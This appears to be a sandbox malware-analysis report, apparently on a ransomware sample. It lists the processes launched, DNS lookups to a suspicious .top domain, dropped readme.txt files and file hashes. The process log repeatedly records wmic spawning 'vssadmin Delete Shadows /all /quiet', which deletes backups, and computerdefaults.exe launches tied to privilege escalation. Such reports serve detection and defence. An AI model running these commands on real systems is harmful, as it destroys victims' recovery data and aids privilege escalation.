C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1712 /prefetch:1

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1960,2388838336364902829,10538536129010779848,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5320 /prefetch:2

Network

Country  Destination       Domain                                 Proto
US       8.8.8.8:53        28.118.140.52.in-addr.arpa             udp
US       8.8.8.8:53        172.210.232.199.in-addr.arpa           udp
US       8.8.8.8:53        73.159.190.20.in-addr.arpa             udp
US       8.8.8.8:53        78800e98f0cc24503uahnpdvb.iecard.top   udp
US       8.8.8.8:53        google.com                             udp
US       8.8.8.8:53        google.com                             udp
N/A      224.0.0.251:5353                                         udp
US       8.8.8.8:53        241.150.49.20.in-addr.arpa             udp
US       8.8.8.8:53        78800e98f0cc24503uahnpdvb.iecard.top   udp
US       8.8.8.8:53        149.220.183.52.in-addr.arpa            udp
US       8.8.8.8:53        53.210.109.20.in-addr.arpa             udp
US       8.8.8.8:53        18.31.95.13.in-addr.arpa               udp
US       8.8.8.8:53        78800e98f0cc24503uahnpdvb.iecard.top   udp
US       8.8.8.8:53        172.214.232.199.in-addr.arpa           udp
US       8.8.8.8:53        14.227.111.52.in-addr.arpa             udp
US       8.8.8.8:53        78800e98f0cc24503uahnpdvb.iecard.top   udp
US       8.8.8.8:53        85.65.42.20.in-addr.arpa               udp

Files

C:\Users\Admin\Pictures\readme.txt

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

\??\pipe\LOCAL\crashpad_4268_VNHZJZMHJIJVMFAE

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\9b9cdc69c1c24e2b.automaticDestinations-ms

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133779325036628517.txt

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Public\readme.txt

MD5 718777534403cdcf89b5d9b5f4b2f141
SHA1 3f49f57f3c25d60fef6d5593c9eb5a69b74a7b29
SHA256 619de8a85d1beac2e0b2c9cef08f56fc70859f6f4dd0f763d2175bdac746b0cb
SHA512 8018fdbec663355db212827869eb7744f615f58db96e9a12da248f40979d28d8057bcab945381e43cb346e0b3ded14743efd8b47727ca98e32e430b6519d7440

memory/3844-431-0x00000265FCFB0000-0x00000265FCFB8000-memory.dmp

memory/3844-432-0x00000265FCE60000-0x00000265FCE61000-memory.dmp